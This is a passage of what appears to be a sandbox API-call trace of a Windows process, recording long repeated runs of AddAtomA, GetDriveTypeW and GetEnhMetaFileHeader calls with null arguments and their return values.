AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.178] AddAtomA (lpString=0x0) returned 0x0 [0108.178] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.179] AddAtomA (lpString=0x0) returned 0x0 [0108.179] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.179] AddAtomA (lpString=0x0) returned 0x0 [0108.179] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.179] AddAtomA (lpString=0x0) returned 0x0 [0108.179] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.179] AddAtomA (lpString=0x0) returned 0x0 [0108.179] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.179] AddAtomA (lpString=0x0) returned 0x0 [0108.179] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.195] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.196] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.197] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] 